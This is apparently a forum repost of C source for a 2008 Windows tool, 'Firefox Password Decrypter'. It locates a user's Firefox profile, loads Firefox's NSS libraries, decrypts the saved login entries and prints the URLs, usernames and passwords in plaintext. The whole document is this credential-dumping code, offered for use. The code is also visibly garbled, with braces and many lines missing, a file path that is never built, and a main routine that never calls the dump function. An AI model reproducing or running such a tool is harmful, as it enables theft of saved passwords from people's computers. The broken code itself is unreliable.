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FF pass Decrypt

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FF pass Decrypt

Firefox Password Decrypter by KriPpLer


// Description: Firefox Password Cache Decrypter
// Versions: Firefox 1, 2, and 3
// Author: KriPpLer
// Language: C
// Released: 9/9/2008
// URL: http://www.krippler.com/
// Credit: http://securityxploded.com/ (FF 2 Source)
// Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <userenv.h>
#pragma comment(lib,"userenv.lib")

//Firefox internal SEC structures
typedef enum SECItemType
siBuffer = 0,
siClearDataBuffer = 1,
siCipherDataBuffer = 2,
siDERCertBuffer = 3,
siEncodedCertBuffer = 4,
siDERNameBuffer = 5,
siEncodedNameBuffer = 6,
siAsciiNameString = 7,
siAsciiString = 8,
siDEROID = 9,
siUnsignedInteger = 10,
siUTCTime = 11,
siGeneralizedTime = 12

struct SECItem
SECItemType type;
unsigned char *data;
unsigned int len;

typedef enum SECStatus
SECWouldBlock = -2,
SECFailure = -1,
SECSuccess = 0
//Removes gecko-sdk dependency
#define PRBool int
#define PRUint32 unsigned int
#define PR_TRUE 1
#define PR_FALSE 0

//Mozilla library names
#define NSS_LIBRARY_NAME "nss3.dll"
#define PLC_LIBRARY_NAME "plc4.dll"
#define NSPR_LIBRARY_NAME "nspr4.dll"
#define SQLITE_LIBRARY_NAME "sqlite3.dll"
#define MOZCRT_LIBRARY_NAME "mozcrt19.dll"
#define NSSU_LIBRARY_NAME "nssutil3.dll"
#define NSSU_LIBRARY_NAME "nssutil3.dll"
#define PLDS_LIBRARY_NAME "plds4.dll"
#define SOFTN_LIBRARY_NAME "softokn3.dll"

#define LOADLIBRARY(x) LoadLibrary(x)
#define GETPROCADDRESS GetProcAddress
#define FREELIBRARY FreeLibrary
const int buflen = 10240;
static char readbuf[buflen+1];
static int last = 0;
static int next = 0;

typedef struct PK11SlotInfoStr PK11SlotInfo;

// NSS Library functions
typedef SECStatus (*NSS_Init) (const char *configdir);
typedef SECStatus (*NSS_Shutdown) (void);
typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void);
typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot);
typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw);
typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx);
typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx);

// PLC Library functions
typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest);

// Function declarations..
void NSSUnload();
int InitFFLibs(char *firefoxPath);
int InitializeNSSLibrary(char *profilePath, char *password);
int CheckMasterPassword(char *password);
int DirectoryExists( char *path );
void StrLwr(char *str);
int OpenFile(char *filePath);
void CloseFile();
int ReadLine(char *buffer, int size);
char *GetFFProfilePath();
char *GetFFLibPath();
char *GetFFVersion();
char **Explode(char *StrIn,const char *Delimiter);
char *Split(char *String,char Delimeter[],int Part);
char *replace(char *str, const char *substr, const char *repstr);

char ReadChar();
char Vers[_MAX_PATH] = "";
int version = 1;

int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen);
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen);
NSS_Init NSSInit = NULL;
NSS_Shutdown NSSShutdown = NULL;
PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL;
PK11_CheckUserPassword PK11CheckUserPassword = NULL;
PK11_FreeSlot PK11FreeSlot = NULL;
PK11_Authenticate PK11Authenticate = NULL;
PK11SDR_Decrypt PK11SDRDecrypt = NULL;
PL_Base64Decode PLBase64Decode = NULL;

int IsNSSInitialized = 0;

HMODULE libnss = NULL;
HMODULE libplc = NULL;
HMODULE libtmp = NULL;

FILE *signonFile = NULL;

int OpenFile(char *filePath)
last = next = 0;
signonFile = fopen(filePath, "r");

if( signonFile == NULL )
return 0; //fail

return 1;
char ReadChar()

if (next >= last)
next = 0;
last = fread(readbuf, 1, buflen, signonFile);
if (last <= 0 )
return 0;

return (readbuf[next++]);
int ReadLine(char *buffer, int size)
unsigned int c;
int strLength = 0, i=0;

buffer[0] = 0;

c = ReadChar();

// eof reached
if ( c == 0 ) // || feof(file) )
return 0;

if (c == '\n')
buffer[strLength++] = 0;

if (c != '\r')
for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++)
if( strLength >= size )

printf("\n Buffer is insufficient to store data");
return 0;
// Increase buffer capacity dynamically
buffer[strLength++] = (char)c;
c = c >> 8;

return 1;

//Misc functions
int DirectoryExists( char *path )
DWORD attr = GetFileAttributes(path);
if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) )
return 0;
return 1;
void StrLwr(char *str)
int n=strlen(str);
for(int i=0; i<n; i++)
if( str[i] >=65 && str[i]<=90 )
//Loads specified firefox library with the given ffdir path as root
HMODULE LoadLibrary(char *firefoxDir, char *libName)
char loadPath[4096]="";

strcpy(loadPath, firefoxDir);
strcat(loadPath, "/");
strcat(loadPath, libName);

libtmp = LOADLIBRARY(loadPath);

if( !libtmp )
return 0; //Failed to load library

return libtmp;
int InitFFLibs(char *FFDir)
libnss = libplc = NULL;

//Load all required dll's
if( FFDir != NULL )

//Minor version check
if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower
goto version2;
} else {
if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) )
if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) )

if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) )


if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) )
libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME);
if(libnss )
printf("\n\n Librarys loaded from master firefox path successfully");


// Now load from current path.
if( !libnss )
if( !libnss || !libplc )
printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME);
return 0;
} else {
printf("\n Firefox Libraries loaded successfully");

// Extract the required functions....
NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init");
NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown");
PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot");
PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot");
PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate");
PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt");
PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword");

if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword)
printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME);
return 0;

// Get the functions from PLC library
PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode");

if( !PLBase64Decode )
printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME);
return 0;
} else {
printf("\n Firefox library initialized successfully");

return 1;
int InitializeNSSLibrary(char *profilePath)
IsNSSInitialized = 0;

// Initialize the NSS library
if( (*NSSInit) (profilePath) != SECSuccess )
printf("\n\n NSSLib Initialization failed");
return 0;
} else {
IsNSSInitialized = 1;
printf("\n NSS library initiliazed successfully");

return 1;
void NSSUnload()
if( IsNSSInitialized && (NSSShutdown != NULL) )

if( libnss != NULL )
FREELIBRARY(libnss); //Free nss library

if( libplc != NULL )
FREELIBRARY(libplc); //Free plc library
int DecryptStr(char *cryptData, char **clearData)
int decodeLen = 0;
int finalLen = 0;
char *decodeData = NULL;
char *finalData = NULL;

if( cryptData[0] != NULL )
if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) )
return 0;

// Do the actual PK11 decryption
if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL))
return 0;

*clearData = (char*) malloc( finalLen + 1 );
if( *clearData == NULL )
printf("\n Insufficient memory");
return 0;
memcpy(*clearData, finalData, finalLen);
*(*clearData + finalLen) = 0; // Null terminate string

return 1;

if( Base64Decode(cryptData, clearData, &decodeLen) == 0 )
return 0;

return 1;
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen)
int len = strlen( cryptData );
int adjust = 0;

if (cryptData[len-1] == '=')
if (cryptData[len-2] == '=')

*decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL);

if( *decodeData == NULL )
return 0;

*decodeLen = (len*3)/4 - adjust;

return 1;
int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen)
PK11SlotInfo *slot = 0;
SECStatus status;
SECItem request;
SECItem reply;

// Find token with SDR key
slot = (*PK11GetInternalKeySlot)();

if (!slot)
return 0;

// Decrypt the string
request.data = (unsigned char *)decodeData;
request.len = decodeLen;
reply.data = 0;
reply.len = 0;

status = (*PK11SDRDecrypt)(&request, &reply, NULL);

if (status != SECSuccess)
return 0;

*clearData = (char*)reply.data;
*finalLen = reply.len;

// Free the slot
return 1;
int DumpCache(char *profilePath,char *signonFile)
char buffer[10240];
char sbuffer[10240];
char name[10240];

char *clearData = NULL;

int bufferLength = 10240;
int count = 0;
int ret;

if( profilePath == NULL || signonFile == NULL)
return 0;


if(OpenFile(sbuffer) == 0 ) // Open the signon file
printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile);
return 0;
} else {
printf("\n\n ============================================================== ");
printf("\n = %s = ",signonFile);
printf("\n ============================================================== ");

Begin cache dump

printf("\n\n ======================= Unmanaged URLS ======================= ");

// Read out the unmanaged ("Never remember" URL list

ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag

while (ReadLine(buffer, bufferLength) != 0)
// End of unmanaged list
if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
printf("\n %s ", buffer);
printf("\n ======================== Managed URLS ========================\n");

// read the URL line
while (ReadLine(buffer, bufferLength) != 0 ){

printf("\n URL: %s ", buffer);

//Start looping through final singon*.txt file
while (ReadLine(buffer, bufferLength) != 0 )

if (buffer[0] == '.')
printf("\n ==============================================================\n");
break; // end of cache entry

//Check if its a password
if (buffer[0] == '*')
ret = ReadLine(buffer, bufferLength);
} else {
strcpy(name, buffer);
ret = ReadLine(buffer, bufferLength);

if( DecryptStr(buffer, &clearData) == 1 )
printf("\n %s: %s ", name, clearData);
clearData = NULL;
printf("\n\n ============================================================== ");
printf("\n = END %s = ",signonFile);
printf("\n ============================================================== \n");

return 1;
End pcache dump
// Find firefox path / libraries
char *GetFFLibPath()
char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
char path[_MAX_PATH] ="";
char *FFDir = NULL;
DWORD pathSize = _MAX_PATH;
DWORD valueType;
HKEY rkey;

// Open firefox registry key
if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
return NULL;

// Read the firefox path
if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
printf("\n Failed to read the firefox path value from registry ");
return NULL;

if( pathSize <= 0 || path[0] == 0)
printf("\n Unable to locate firefox installation path");
return NULL;


// Remove extra quotes
if( path[0] == '\"' )
for(int i=0; i < strlen(path)-1 ; i++)
path[i] = path[i+1];

printf("\n Firefox main exe: %s", path);

// Terminate the string at last "\\"
for(int j=strlen(path)-1; j>0; j--)
if( path[j] == '\\' )

FFDir = (char*) malloc( strlen(path) + 1);

strcpy(FFDir, path);
printf("\n Firefox path: %s", FFDir);

return FFDir;
char *GetFFProfilePath()
char profilePath[_MAX_PATH] = "";
char partialPath[] = "Application Data\\Mozilla\\Firefox";
char profileFile[_MAX_PATH];
char line[1024];

DWORD pathSize = _MAX_PATH;
char *finalProfilePath = NULL;
int isDefaultFound = 0;
HANDLE token;

// Get current user's profile directory
if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE )
printf("\n Failed to get current process token ");
return NULL;

if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE )
printf("\n Failed to get user profile directory");
return NULL;

printf("\n User Profile directory: %s\n", profilePath);

// Get firefox profile directory
strcpy(profileFile, profilePath);

// Open the firefox profile setting file
FILE *profile = fopen(profileFile, "r");

if( profile == NULL )
printf("\n Unable to find firefox profile file: %s ", profileFile);
return NULL;

// This indicates that we are looking under default profile
while(fgets(line, 1024, profile))

if( !isDefaultFound && ( strstr(line, "name=default") != NULL) )
isDefaultFound = 1;

// Found default profile / check for path
if( isDefaultFound )
if( strstr(line,"path=") != NULL)
char *slash = strstr(line,"/");

if( slash != NULL )
*slash = '\\';

// remove \n from the end of line
line[strlen(line)-1] = 0;

char *start = strstr(line,"=");

int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ;
finalProfilePath = (char *) malloc(totalLen);

if( finalProfilePath )

printf("\n Final profile path: %s \n", finalProfilePath);




return finalProfilePath;
char *GetFFVersion()
char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox";
char *FFVers = NULL;
DWORD pathSize = _MAX_PATH;
DWORD valueType;
HKEY rkey;

// Open firefox registry key
if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
return NULL;

// Read the firefox path value
if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS )
printf("\n Failed to read the firefox version from registry ");
return NULL;

if( pathSize <= 0 || Vers[0] == 0)
printf("\n Path value read from the registry is empty");
return NULL;


FFVers = (char*) malloc( strlen(Vers) + 1);

if( FFVers )
if (FFVers[1] == '1')
version = 1;
if (FFVers[1] == '2')
version = 2;
if (FFVers[1] == '3')
version = 3;
printf("\n Firefox version: %d", version);

return (FFVers);
int main(int argc, char* argv[])
char *ProfilePath = NULL; //Profile path
char *FFDir = NULL; //Firefox main installation path
char buff[1024];

ProfilePath = GetFFProfilePath();

if( !DirectoryExists(ProfilePath))
printf("\n\n Firefox profile directory does not exist or no profiles found. \n");
return 0;

FFDir = GetFFLibPath();

if( !DirectoryExists(ProfilePath))
printf("\n\n Firefox installation path does not exist or is not installed. \n");
return 0;
if( InitFFLibs(FFDir) )
if( InitializeNSSLibrary(ProfilePath) )
//Take 3 Mozilla dumps
//Dont forget to flush :/

printf("\n ======================= End Cache Dump =======================\n");

Sleep(10000); //Just loop until user exits


Sursa: LeetCoders

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